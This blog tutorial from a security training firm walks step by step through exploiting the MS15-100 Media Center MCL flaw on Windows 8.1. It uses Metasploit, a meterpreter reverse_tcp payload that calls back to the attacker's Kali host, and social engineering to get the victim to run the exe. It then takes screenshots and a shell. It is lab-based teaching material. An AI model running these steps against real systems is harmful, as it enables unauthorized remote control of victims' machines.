Exploit Windows 8.1 using Media Centre Vulnerability (MCL)-MS15_100 With Metasploit–2017

NOTE: THIS POST IS ONLY FOR EDUCATIONAL PURPOSES. USE THIS AT YOUR OWN RISK.

This post is about Microsoft Windows Media Centre MCL vulnerability. In this Post we discuss about MCL(MS15-100) vulnerability and exploit this vulnerability to compromise the windows 8.1 pro.

The vulnerability could allow remote code execution if Windows Media Center opens a specially crafted Media Center link (.mcl) file that references malicious code. An attacker who successfully exploited this vulnerability could gain the same user rights as the current user.

This security update is rated Important for all supported editions of Windows Media Center when installed on Windows Vista, Windows 7, Windows 8, or Windows 8.1.

AFFECTED OPERATING SYSTEMS

Operating System
Windows Vista Service Pack 2
Windows Vista x64 Edition Service Pack 2
Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows 8 for 32-bit Systems
Windows 8 for x64-based Systems
Windows 8.1 for 32-bit Systems
Windows 8.1 for x64-based Systems

Methdology

We will use Metasploit to exploit the MCL (MS15_100) vulnerability. Using Metasploit we use MS15_100 exploit module. We create a malicious executable file and with some kind of social engineering tricks put this file to our target, as well as our target executes this he/she pawned.

LAB SETUP

We will use Windows 8.1 Pro as a Target Machine which running live and Kali Linux 2.0  Machine as a Attacker Machine which is also running Live. Kali Linux IP Address à 172.158.11.45

Steps of Exploitation

Step 1.

First of all open terminal in Kali Linux machine and type msfconsole.  This command start Metasploit but this take little bit time, wait for some moments Metasploit will run as you can see in picture

Step 2.

Now we have to load our exploit of  MCL vulnerability which is pre-installed in Metasploit. So to load it type use exploit/windows/fileformat/ms15_100_mcl_exe. This command load our exploit.

Step 3.

Set payload for reverse connection of target machine type set payload windows/meterpreter/reverse_tcp

Step 4.

Now check the required options for exploit and payload. to check these type show options and it display all required options

Here we have to configure exploit and payload. We have to set srvhost (server host address), on this address our exploit is hosted. To set srvhost type set srvhost <your kali linux machine ip address>

Set local host(lhost) address for payload . This address is also our Kali linux machine’s ip address which used to get reverse connection.

To find your kali linux machine ip address run a new terminal and type ifconfig

Step 5. Now set the srvhost and lhost .. as you see in picture.

type set srvhost 172.158.11.45

type set lhost 172.158.11.45

Step 6.

All weapons are loaded just fire up our weapons by type exploit command. As you type exploit it creates malicious  executable file with mcl link. Get this file on our target machine with some kind of social engineering techniques.

Step 7.

Open the link in target machine which is genrated by exploit. in my case this link is  \\172.158.11.45\GkRhdy\msf.exe and download the exe file

Step 8.

Now run this file in target machine 

Step 9.

When the target click on run then we get a meterpreter session in our attacker machine ( kali linux)

Step 10.

Now check the meterpreter sessions type sessions -i command

Step 11.

To get the meterpreter session type session -i <id> command for example sessions -i 1  and you get the merterpreter session

Step 12.

In meterpreter session we can do lots of things. here we type help command to check what interesting commands we can run

Step 13.

I run screenshot command in meterpreter to get the screen shot of target machine and it saved in /root directory. After that i run one more command , the shell command to get the cmd of target machine and we get the cmd of target machine

Step 14.

After getting the cmd of traget machine i type systeminfo command and get all the details of target machine.

Author — Kamaljeet Kumar – Information Security Engineer, Codec Networks, Delhi

About

Codec Networks provides IT Trainings from EC Council CEH ECSA, LPT, CHFI, Network Security, Penetration Testing, ISACA, ISC2, PECB ISO 27001LA LI, Cisco Networking CCNA CCNP, Linux Administration RHCE, Prog Languages JAVA, Advanced Java, android development. We also offer B2B Industry Solutions and Services in IT | Information|Cyber Security in Delhi NCR India.

View all posts by